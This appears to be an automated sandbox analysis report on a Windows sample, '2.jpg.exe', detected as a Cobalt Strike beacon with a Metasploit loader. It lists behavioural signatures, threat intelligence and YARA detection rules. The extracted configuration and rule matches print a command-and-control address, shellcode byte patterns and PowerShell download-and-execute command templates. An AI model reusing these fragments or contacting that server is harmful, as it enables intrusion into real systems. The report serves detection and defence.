Edit tour

Windows Analysis Report
2.jpg.exe

Overview

General Information

Sample name:	2.jpg.exe
Analysis ID:	1428599
MD5:	93fb70bf6b2fc6da414d9e6a80ecda4f
SHA1:	f04e6e242635c94df8e052a589a886a506095db1
SHA256:	2b5a8036263fe6e79d34e9b1a51a73e86cdc53a6d1037e07d9ecbe5a3de29126
Tags:	exe
Infos:

Detection

CobaltStrike, Metasploit, ReflectiveLoader

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Detected unpacking (creates a PE file in dynamic memory)

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Yara detected CobaltStrike

Yara detected Metasploit Payload

Yara detected Powershell download and execute

Yara detected ReflectiveLoader

.NET source code contains potential unpacker

C2 URLs / IPs found in malware configuration

Contains functionality to detect sleep reduction / modifications

Machine Learning detection for sample

Uses an obfuscated file name to hide its real file extension (double extension)

Uses known network protocols on non-standard ports

Yara detected Costura Assembly Loader

Abnormal high CPU Usage

Allocates memory with a write watch (potentially for evading sandboxes)

Binary contains a suspicious time stamp

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to dynamically determine API calls

Contains functionality to execute programs as a different user

Contains functionality to launch a process as a different user

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found decision node followed by non-executed suspicious APIs

Found evasive API chain (date check)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

Internet Provider seen in connection with other malware

May check if the current machine is a sandbox (GetTickCount - Sleep)

May sleep (evasive loops) to hinder dynamic analysis

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Process Tree

System is w10x64

2.jpg.exe (PID: 7272 cmdline: "C:\Users\user\Desktop\2.jpg.exe" MD5: 93FB70BF6B2FC6DA414D9E6A80ECDA4F)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Cobalt Strike, CobaltStrike	Cobalt Strike is a paid penetration testing product that allows an attacker to deploy an agent named 'Beacon' on the victim machine. Beacon includes a wealth of functionality to the attacker, including, but not limited to command execution, key logging, file transfer, SOCKS proxying, privilege escalation, mimikatz, port scanning and lateral movement. Beacon is in-memory/file-less, in that it consists of stageless or multi-stage shellcode that once loaded by exploiting a vulnerability or executing a shellcode loader, will reflectively load itself into the memory of a process without touching the disk. It supports C2 and staging over HTTP, HTTPS, DNS, SMB named pipes as well as forward and reverse TCP; Beacons can be daisy-chained. Cobalt Strike comes with a toolkit for developing shellcode loaders, called Artifact Kit.The Beacon implant has become popular amongst targeted attackers and criminal users as it is well written, stable, and highly customizable.	APT 29 APT32 APT41 AQUATIC PANDA Anunak Cobalt Codoso CopyKittens DarkHydrus FIN6 FIN7 Leviathan Mustang Panda Shell Crew Stone Panda TianWu UNC1878 UNC2452 Winnti Umbrella	http://blog.morphisec.com/new-global-attack-on-point-of-sale-systems http://blog.nsfocus.net/murenshark http://stillu.cc/assets/slides/2023-08-Unmasking%20CamoFei.pdf http://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/bluebottle-banks-targeted-africa http://www.secureworks.com/research/threat-profiles/gold-drake	https://malpedia.caad.fkie.fraunhofer.de/details/win.cobalt_strike

Malware Configuration

Threatname: CobaltStrike

{"C2Server": "http://8.218.236.5:None/j9sF", "User Agent": "User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; MALC)\r\n"}

Threatname: Metasploit

{"Headers": "User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; MALC)\r\n", "Type": "Metasploit Download", "URL": "http://8.218.236.5/j9sF"}

Yara Signatures

Initial Sample

Source	Rule	Description	Author	Strings
2.jpg.exe	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security

Memory Dumps

Source	Rule	Description	Author	Strings
00000000.00000002.4124836777.00000000026D8000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_MetasploitPayload_3	Yara detected Metasploit Payload	Joe Security
00000000.00000002.4124836777.00000000026D8000.00000004.00000800.00020000.00000000.sdmp	Windows_Shellcode_Generic_8c487e57	unknown	unknown	0x1423c:$a: FC E8 89 00 00 00 60 89 E5 31 D2 64 8B 52 30 8B 52 0C 8B 52 14 8B 72 28 0F B7 4A 26 31 FF 31 C0
00000000.00000002.4124836777.00000000026D8000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Metasploit_38b8ceec	Identifies the API address lookup function used by metasploit. Also used by other tools (like beacon).	unknown	0x14243:$a1: 89 E5 31 D2 64 8B 52 30 8B 52 0C 8B 52 14 8B 72 28 0F B7 4A 26 31 FF 31 C0 AC 3C 61
00000000.00000002.4124836777.00000000026D8000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Metasploit_24338919	Identifies metasploit wininet reverse shellcode. Also used by other tools (like beacon).	unknown	0x142cc:$a1: 68 6E 65 74 00 68 77 69 6E 69 54 68 4C 77 26 07
00000000.00000002.4126125579.0000000006794000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Metasploit_7bc0f998	Identifies the API address lookup function leverage by metasploit shellcode	unknown	0x87:$a1: 48 31 D2 65 48 8B 52 60 48 8B 52 18 48 8B 52 20 48 8B 72 50 48 0F B7 4A 4A 4D 31 C9 48 31 C0 AC 3C 61
00000000.00000002.4126125579.0000000006794000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Metasploit_c9773203	Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families.	unknown	0xf3:$a: 48 31 C0 AC 41 C1 C9 0D 41 01 C1 38 E0 75 F1 4C 03 4C 24 08 45 39 D1
00000000.00000002.4125800908.0000000005F30000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_MetasploitPayload_3	Yara detected Metasploit Payload	Joe Security
00000000.00000002.4125800908.0000000005F30000.00000040.00001000.00020000.00000000.sdmp	Windows_Shellcode_Generic_8c487e57	unknown	unknown	0x0:$a: FC E8 89 00 00 00 60 89 E5 31 D2 64 8B 52 30 8B 52 0C 8B 52 14 8B 72 28 0F B7 4A 26 31 FF 31 C0
00000000.00000002.4125800908.0000000005F30000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Metasploit_38b8ceec	Identifies the API address lookup function used by metasploit. Also used by other tools (like beacon).	unknown	0x7:$a1: 89 E5 31 D2 64 8B 52 30 8B 52 0C 8B 52 14 8B 72 28 0F B7 4A 26 31 FF 31 C0 AC 3C 61
00000000.00000002.4125800908.0000000005F30000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Metasploit_24338919	Identifies metasploit wininet reverse shellcode. Also used by other tools (like beacon).	unknown	0x90:$a1: 68 6E 65 74 00 68 77 69 6E 69 54 68 4C 77 26 07
00000000.00000000.1672509121.0000000000292000.00000002.00000001.01000000.00000003.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
00000000.00000002.4125949262.0000000006360000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_CobaltStrike_2	Yara detected CobaltStrike	Joe Security
00000000.00000002.4125949262.0000000006360000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
00000000.00000002.4125949262.0000000006360000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_CobaltStrike	Yara detected CobaltStrike	Joe Security
00000000.00000002.4125949262.0000000006360000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_CobaltStrike_3	Yara detected CobaltStrike	Joe Security
00000000.00000002.4125949262.0000000006360000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_CobaltStrike_ee756db7	Attempts to detect Cobalt Strike based on strings found in BEACON	unknown	0x2dc6d:$a1: %s.4%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x2dce5:$a2: %s.3%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x2e44f:$a3: ppid %d is in a different desktop session (spawned jobs may fail). Use 'ppid' to reset. 0x2e778:$a4: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/'); %s 0x2e70a:$a5: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/') 0x2e778:$a5: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/') 0x2dd48:$a6: %s.2%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x2ded9:$a7: could not run command (w/ token) because of its length of %d bytes! 0x2dd8e:$a8: %s.2%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x.%x%x.%s 0x2ddcc:$a9: %s.2%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x.%x%x.%s 0x2e7c2:$a10: powershell -nop -exec bypass -EncodedCommand "%s" 0x2e039:$a11: Could not open service control manager on %s: %d 0x2e56b:$a12: %d is an x64 process (can't inject x86 content) 0x2e59b:$a13: %d is an x86 process (can't inject x64 content) 0x2e8b3:$a14: Failed to impersonate logged on user %d (%u) 0x2e524:$a15: could not create remote thread in %d: %d 0x2de02:$a16: %s.1%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x2e4d2:$a17: could not write to process memory: %d 0x2e06a:$a18: Could not create service %s on %s: %d 0x2e0f3:$a19: Could not delete service %s on %s: %d 0x2df53:$a20: Could not open process token: %d (%u)
00000000.00000002.4125949262.0000000006360000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_CobaltStrike_f0b627fc	Rule for beacon reflective loader	unknown	0x8830:$beacon_loader_x86_2: 81 E1 FF FF FF 00 81 F9 41 41 41 00 75 1D 8B 55 D8 81 E2 FF FF FF 00 81 FA 42 42 42 00 75 0x94d0:$beacon_loader_x86_2: 81 E1 FF FF FF 00 81 F9 41 41 41 00 75 1D 8B 55 D8 81 E2 FF FF FF 00 81 FA 42 42 42 00 75
00000000.00000002.4125949262.0000000006360000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Metasploit_7bc0f998	Identifies the API address lookup function leverage by metasploit shellcode	unknown	0x326c4:$a1: 48 31 D2 65 48 8B 52 60 48 8B 52 18 48 8B 52 20 48 8B 72 50 48 0F B7 4A 4A 4D 31 C9 48 31 C0 AC 3C 61
00000000.00000002.4125949262.0000000006360000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Metasploit_c9773203	Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families.	unknown	0x32730:$a: 48 31 C0 AC 41 C1 C9 0D 41 01 C1 38 E0 75 F1 4C 03 4C 24 08 45 39 D1
00000000.00000002.4125949262.0000000006360000.00000040.00001000.00020000.00000000.sdmp	CobaltStrike_Unmodifed_Beacon	Detects unmodified CobaltStrike beacon DLL	yara@s3c.za.net	0x3047b:$loader_export: ReflectiveLoader 0x3046f:$exportname: beacon.dll
00000000.00000002.4125949262.0000000006360000.00000040.00001000.00020000.00000000.sdmp	WiltedTulip_ReflectiveLoader	Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip	Florian Roth	0x2e7c2:$x1: powershell -nop -exec bypass -EncodedCommand "%s" 0x2e59b:$x2: %d is an x86 process (can't inject x64 content) 0x2e778:$x3: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/'); %s 0x2e85c:$x4: Failed to impersonate token from %d (%u) 0x2e8b3:$x5: Failed to impersonate logged on user %d (%u) 0x2dc6d:$x6: %s.4%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s
00000000.00000002.4125949262.0000000006360000.00000040.00001000.00020000.00000000.sdmp	Trojan_Raw_Generic_4	unknown	unknown	0x8ee8:$s0: 83 C6 02 8B 7D D8 B9 40 00 00 00 F3 A4 0F B6 55 18 52 6A 40 8B 45 D8 50 E8 B9 FA FF FF 83 C4 0C 8B 4D D8 51 8B 55 14 52 8B 45 08 8B 48 04 FF D1 0x9b88:$s0: 83 C6 02 8B 7D D8 B9 40 00 00 00 F3 A4 0F B6 55 18 52 6A 40 8B 45 D8 50 E8 B9 FA FF FF 83 C4 0C 8B 4D D8 51 8B 55 14 52 8B 45 08 8B 48 04 FF D1 0x8a28:$s1: 0F B7 11 81 FA 4D 5A 00 00 75 2E 8B 45 F8 8B 48 3C 89 4D FC 83 7D FC 40 72 1F 81 7D FC 00 04 00 00 73 16 8B 55 FC 03 55 F8 89 55 FC 8B 45 FC 81 38 50 45 00 00 75 02 EB 0B 8B 4D F8 83 E9 01 89 ... 0x96c8:$s1: 0F B7 11 81 FA 4D 5A 00 00 75 2E 8B 45 F8 8B 48 3C 89 4D FC 83 7D FC 40 72 1F 81 7D FC 00 04 00 00 73 16 8B 55 FC 03 55 F8 89 55 FC 8B 45 FC 81 38 50 45 00 00 75 02 EB 0B 8B 4D F8 83 E9 01 89 ...
00000000.00000002.4126125579.0000000006760000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
00000000.00000002.4126125579.0000000006760000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_CobaltStrike	Yara detected CobaltStrike	Joe Security
00000000.00000002.4126125579.0000000006760000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_CobaltStrike_3	Yara detected CobaltStrike	Joe Security
00000000.00000002.4126125579.0000000006760000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_CobaltStrike_ee756db7	Attempts to detect Cobalt Strike based on strings found in BEACON	unknown	0x2f430:$a1: %s.4%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x2f4a8:$a2: %s.3%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x2fc12:$a3: ppid %d is in a different desktop session (spawned jobs may fail). Use 'ppid' to reset. 0x2ff3b:$a4: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/'); %s 0x2fecd:$a5: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/') 0x2ff3b:$a5: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/') 0x2f50b:$a6: %s.2%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x2f69c:$a7: could not run command (w/ token) because of its length of %d bytes! 0x2f551:$a8: %s.2%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x.%x%x.%s 0x2f58f:$a9: %s.2%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x.%x%x.%s 0x2ff85:$a10: powershell -nop -exec bypass -EncodedCommand "%s" 0x2f7fc:$a11: Could not open service control manager on %s: %d 0x2fd2e:$a12: %d is an x64 process (can't inject x86 content) 0x2fd5e:$a13: %d is an x86 process (can't inject x64 content) 0x30076:$a14: Failed to impersonate logged on user %d (%u) 0x2fce7:$a15: could not create remote thread in %d: %d 0x2f5c5:$a16: %s.1%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x2fc95:$a17: could not write to process memory: %d 0x2f82d:$a18: Could not create service %s on %s: %d 0x2f8b6:$a19: Could not delete service %s on %s: %d 0x2f716:$a20: Could not open process token: %d (%u)
00000000.00000002.4126125579.0000000006760000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_CobaltStrike_f0b627fc	Rule for beacon reflective loader	unknown	0x93f3:$beacon_loader_x86_2: 81 E1 FF FF FF 00 81 F9 41 41 41 00 75 1D 8B 55 D8 81 E2 FF FF FF 00 81 FA 42 42 42 00 75 0xa093:$beacon_loader_x86_2: 81 E1 FF FF FF 00 81 F9 41 41 41 00 75 1D 8B 55 D8 81 E2 FF FF FF 00 81 FA 42 42 42 00 75
00000000.00000002.4126125579.0000000006760000.00000040.00001000.00020000.00000000.sdmp	Beacon_K5om	Detects Meterpreter Beacon - file K5om.dll	Florian Roth	0x2ff3b:$x1: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/'); %s 0x2ff85:$x2: powershell -nop -exec bypass -EncodedCommand "%s" 0x2fd5e:$x3: %d is an x86 process (can't inject x64 content) 0x2f716:$s1: Could not open process token: %d (%u) 0x2f430:$s3: %s.4%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x2f7d9:$s4: Could not connect to pipe (%s): %d
00000000.00000002.4126125579.0000000006760000.00000040.00001000.00020000.00000000.sdmp	CobaltStrike_Unmodifed_Beacon	Detects unmodified CobaltStrike beacon DLL	yara@s3c.za.net	0x31c3e:$loader_export: ReflectiveLoader 0x31c32:$exportname: beacon.dll
00000000.00000002.4126125579.0000000006760000.00000040.00001000.00020000.00000000.sdmp	Leviathan_CobaltStrike_Sample_1	Detects Cobalt Strike sample from Leviathan report	Florian Roth	0x2fd2e:$x2: %d is an x64 process (can't inject x86 content) 0x30076:$x3: Failed to impersonate logged on user %d (%u) 0x2ff85:$s1: powershell -nop -exec bypass -EncodedCommand "%s" 0x2ff3b:$s2: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/'); %s 0x2f69c:$s3: could not run command (w/ token) because of its length of %d bytes! 0x2fc95:$s4: could not write to process memory: %d 0x2f430:$s5: %s.4%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x2f7d9:$s6: Could not connect to pipe (%s): %d
00000000.00000002.4126125579.0000000006760000.00000040.00001000.00020000.00000000.sdmp	crime_win32_csbeacon_1	Detects Cobalt Strike loader	@VK_Intel	0x30408:$str1: %s (admin) 0x31c32:$str2: beacon.dll
00000000.00000002.4126125579.0000000006760000.00000040.00001000.00020000.00000000.sdmp	WiltedTulip_ReflectiveLoader	Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip	Florian Roth	0x2ff85:$x1: powershell -nop -exec bypass -EncodedCommand "%s" 0x2fd5e:$x2: %d is an x86 process (can't inject x64 content) 0x2ff3b:$x3: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/'); %s 0x3001f:$x4: Failed to impersonate token from %d (%u) 0x30076:$x5: Failed to impersonate logged on user %d (%u) 0x2f430:$x6: %s.4%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s
00000000.00000002.4126125579.0000000006760000.00000040.00001000.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_ReflectiveLoader	detects Reflective DLL injection artifacts	ditekSHen	0x31c3d:$s1: _ReflectiveLoader@ 0x31c3e:$s2: ReflectiveLoader@
00000000.00000002.4126125579.0000000006760000.00000040.00001000.00020000.00000000.sdmp	MALWARE_Win_CobaltStrike	CobaltStrike payload	ditekSHen	0x2ff13:$s1: %%IMPORT%% 0x2f414:$s2: www6.%x%x.%s 0x2f408:$s3: cdn.%x%x.%s 0x2f690:$s4: api.%x%x.%s 0x30408:$s5: %s (admin) 0x2f6ff:$s6: could not spawn %s: %d 0x2ffb7:$s7: Could not kill %d: %d 0x2f7d9:$s8: Could not connect to pipe (%s): %d 0x2f421:$s9: %s.1%x.%x%x.%s 0x2f430:$s9: %s.4%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x2f4a8:$s9: %s.3%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x2f50b:$s9: %s.2%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x2f551:$s9: %s.2%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x.%x%x.%s 0x2f58f:$s9: %s.2%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x.%x%x.%s 0x2f5c5:$s9: %s.1%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x2f5ee:$s9: %s.1%08x%08x%08x%08x%08x%08x.%x%x.%s 0x2f613:$s9: %s.1%08x%08x%08x%08x%08x.%x%x.%s 0x2f634:$s9: %s.1%08x%08x%08x%08x.%x%x.%s 0x2f651:$s9: %s.1%08x%08x%08x.%x%x.%s 0x2f66a:$s9: %s.1%08x%08x.%x%x.%s 0x2f67f:$s9: %s.1%08x.%x%x.%s
00000000.00000002.4124836777.0000000002621000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
Process Memory Space: 2.jpg.exe PID: 7272	JoeSecurity_CobaltStrike_2	Yara detected CobaltStrike	Joe Security
Process Memory Space: 2.jpg.exe PID: 7272	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
Process Memory Space: 2.jpg.exe PID: 7272	JoeSecurity_CobaltStrike_1	Yara detected CobaltStrike	Joe Security
Process Memory Space: 2.jpg.exe PID: 7272	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
Process Memory Space: 2.jpg.exe PID: 7272	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Process Memory Space: 2.jpg.exe PID: 7272	JoeSecurity_CobaltStrike	Yara detected CobaltStrike	Joe Security
Process Memory Space: 2.jpg.exe PID: 7272	JoeSecurity_CobaltStrike_3	Yara detected CobaltStrike	Joe Security
Process Memory Space: 2.jpg.exe PID: 7272	Windows_Trojan_CobaltStrike_ee756db7	Attempts to detect Cobalt Strike based on strings found in BEACON	unknown	0x33190:$a1: %s.4%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x4cb2f:$a1: %s.4%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x33208:$a2: %s.3%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x4cba7:$a2: %s.3%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x3396d:$a3: ppid %d is in a different desktop session (spawned jobs may fail). Use 'ppid' to reset. 0x4d30c:$a3: ppid %d is in a different desktop session (spawned jobs may fail). Use 'ppid' to reset. 0x33c8c:$a4: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/'); %s 0x4d62b:$a4: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/'); %s 0x33c1e:$a5: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/') 0x33c8c:$a5: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/') 0x4d5bd:$a5: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/') 0x4d62b:$a5: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/') 0x3326b:$a6: %s.2%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x4cc0a:$a6: %s.2%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x333fc:$a7: could not run command (w/ token) because of its length of %d bytes! 0x4cd9b:$a7: could not run command (w/ token) because of its length of %d bytes! 0x332b1:$a8: %s.2%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x.%x%x.%s 0x4cc50:$a8: %s.2%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x.%x%x.%s 0x332ef:$a9: %s.2%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x.%x%x.%s 0x4cc8e:$a9: %s.2%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x.%x%x.%s 0x33cd6:$a10: powershell -nop -exec bypass -EncodedCommand "%s"
Process Memory Space: 2.jpg.exe PID: 7272	CobaltStrike_Unmodifed_Beacon	Detects unmodified CobaltStrike beacon DLL	yara@s3c.za.net	0x35e5d:$loader_export: ReflectiveLoader 0x35e7b:$loader_export: ReflectiveLoader 0x4f7fd:$loader_export: ReflectiveLoader 0x4f81b:$loader_export: ReflectiveLoader 0x35e51:$exportname: beacon.dll 0x35e70:$exportname: beacon.dll 0x4f7f1:$exportname: beacon.dll 0x4f810:$exportname: beacon.dll
Process Memory Space: 2.jpg.exe PID: 7272	WiltedTulip_ReflectiveLoader	Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip	Florian Roth	0x33cd6:$x1: powershell -nop -exec bypass -EncodedCommand "%s" 0x4d675:$x1: powershell -nop -exec bypass -EncodedCommand "%s" 0x33ab9:$x2: %d is an x86 process (can't inject x64 content) 0x4d458:$x2: %d is an x86 process (can't inject x64 content) 0x33c8c:$x3: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/'); %s 0x4d62b:$x3: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/'); %s 0x33d70:$x4: Failed to impersonate token from %d (%u) 0x4d70f:$x4: Failed to impersonate token from %d (%u) 0x33dc7:$x5: Failed to impersonate logged on user %d (%u) 0x4d766:$x5: Failed to impersonate logged on user %d (%u) 0x33190:$x6: %s.4%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x4cb2f:$x6: %s.4%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s
Click to see the 40 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
0.0.2.jpg.exe.290000.0.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
0.2.2.jpg.exe.6760000.2.raw.unpack	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
0.2.2.jpg.exe.6760000.2.raw.unpack	JoeSecurity_CobaltStrike	Yara detected CobaltStrike	Joe Security
0.2.2.jpg.exe.6760000.2.raw.unpack	JoeSecurity_CobaltStrike_3	Yara detected CobaltStrike	Joe Security
0.2.2.jpg.exe.6760000.2.raw.unpack	Windows_Trojan_CobaltStrike_ee756db7	Attempts to detect Cobalt Strike based on strings found in BEACON	unknown	0x2f430:$a1: %s.4%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x2f4a8:$a2: %s.3%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x2fc12:$a3: ppid %d is in a different desktop session (spawned jobs may fail). Use 'ppid' to reset. 0x2ff3b:$a4: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/'); %s 0x2fecd:$a5: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/') 0x2ff3b:$a5: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/') 0x2f50b:$a6: %s.2%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x2f69c:$a7: could not run command (w/ token) because of its length of %d bytes! 0x2f551:$a8: %s.2%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x.%x%x.%s 0x2f58f:$a9: %s.2%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x.%x%x.%s 0x2ff85:$a10: powershell -nop -exec bypass -EncodedCommand "%s" 0x2f7fc:$a11: Could not open service control manager on %s: %d 0x2fd2e:$a12: %d is an x64 process (can't inject x86 content) 0x2fd5e:$a13: %d is an x86 process (can't inject x64 content) 0x30076:$a14: Failed to impersonate logged on user %d (%u) 0x2fce7:$a15: could not create remote thread in %d: %d 0x2f5c5:$a16: %s.1%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x2fc95:$a17: could not write to process memory: %d 0x2f82d:$a18: Could not create service %s on %s: %d 0x2f8b6:$a19: Could not delete service %s on %s: %d 0x2f716:$a20: Could not open process token: %d (%u)
